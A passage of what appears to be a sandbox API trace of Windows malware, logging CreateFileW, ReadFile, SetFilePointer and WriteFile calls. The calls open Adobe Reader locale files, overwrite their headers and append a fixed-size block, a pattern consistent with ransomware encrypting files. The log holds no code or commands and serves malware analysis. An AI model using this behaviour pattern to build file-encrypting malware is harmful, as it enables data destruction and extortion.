lpBuffer=0x2865458*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865458*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0070.486] CloseHandle (hObject=0x1e8) returned 1 [0070.488] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Annots.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\annots.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0071.297] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0071.297] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x76400 [0071.297] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0071.298] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.298] ReleaseMutex (hMutex=0x168) returned 1 [0071.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.DAN", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0071.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.DAN", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.DAN", lpUsedDefaultChar=0x0) returned 10 [0071.298] ReadFile (in: hFile=0x1bc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0071.412] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x75400 [0071.412] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.470] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x75400 [0071.470] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.471] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0071.471] WriteFile (in: hFile=0x1bc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0071.471] CloseHandle (hObject=0x1bc) returned 1 [0071.527] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\makeaccessible.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\makeaccessible.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0071.531] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0071.531] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x12800 [0071.531] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0071.531] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.531] ReleaseMutex (hMutex=0x168) returned 1 [0071.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.DAN", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0071.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.DAN", cchWideChar=18, lpMultiByteStr=0x1f88ba4, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.DAN", lpUsedDefaultChar=0x0) returned 18 [0071.532] ReadFile (in: hFile=0x1fc, lpBuffer=0x2864c58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2864c58*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0071.553] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x11800 [0071.553] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.565] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x11800 [0071.569] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.570] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0071.570] WriteFile (in: hFile=0x1fc, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0071.570] CloseHandle (hObject=0x1fc) returned 1 [0071.571] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Search.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\search.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0071.574] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0071.574] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x5c00 [0071.574] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0071.575] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.575] ReleaseMutex (hMutex=0x168) returned 1 [0071.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.DAN", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0071.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.DAN", cchWideChar=10, lpMultiByteStr=0x1f733cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.DAN", lpUsedDefaultChar=0x0) returned 10 [0071.575] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.592] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4c00 [0071.593] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.595] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x4c00 [0071.595] WriteFile (in: hFile=0x1fc, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.596] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0071.596] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0071.596] CloseHandle (hObject=0x1fc) returned 1 [0071.597] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Acroform.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\acroform.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0071.597] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0071.597] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x6c800 [0071.597] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0071.598] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.598] ReleaseMutex (hMutex=0x168) returned 1 [0071.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.DEU", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0071.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.DEU", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.DEU", lpUsedDefaultChar=0x0) returned 12 [0071.598] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0071.609] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6b800 [0071.609] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.011] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6b800 [0072.016] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.020] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0072.020] WriteFile (in: hFile=0x1fc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0072.020] CloseHandle (hObject=0x1fc) returned 1 [0072.021] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Escript.deu" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\escript.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0072.032] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.039] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa600 [0072.042] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.042] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.042] ReleaseMutex (hMutex=0x168) returned 1 [0072.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Escript.deu", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0072.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Escript.deu", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Escript.deu", lpUsedDefaultChar=0x0) returned 11 [0072.043] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0072.044] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x9600 [0072.045] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.046] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x9600 [0072.046] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.046] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0072.047] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0072.047] CloseHandle (hObject=0x1fc) returned 1 [0072.047] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\reflow.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\reflow.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0072.049] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.049] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1200 [0072.049] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.049] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.050] ReleaseMutex (hMutex=0x168) returned 1 [0072.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.DEU", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0072.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.DEU", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.DEU", lpUsedDefaultChar=0x0) returned 10 [0072.050] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0072.052] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0072.052] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0072.053] CloseHandle (hObject=0x1fc) returned 1 [0072.053] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Weblink.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\weblink.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0072.054] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.054] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7400 [0072.054] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.055] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.055] ReleaseMutex (hMutex=0x168) returned 1 [0072.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.DEU", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0072.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.DEU", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.DEU", lpUsedDefaultChar=0x0) returned 11 [0072.055] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.057] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6400 [0072.057] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.058] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6400 [0072.058] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.059] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0072.059] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.059] CloseHandle (hObject=0x1fc) returned 1 [0072.060] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\DVA.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\dva.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0072.061] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.061] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4e00 [0072.062] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.062] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.062] ReleaseMutex (hMutex=0x168) returned 1 [0072.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.ESP", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0072.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.ESP", cchWideChar=7, lpMultiByteStr=0x1f7ab94, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.ESP", lpUsedDefaultChar=0x0) returned 7 [0072.062] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.064] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3e00 [0072.064] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.065] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3e00 [0072.065] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.066] SetFilePointer (in: 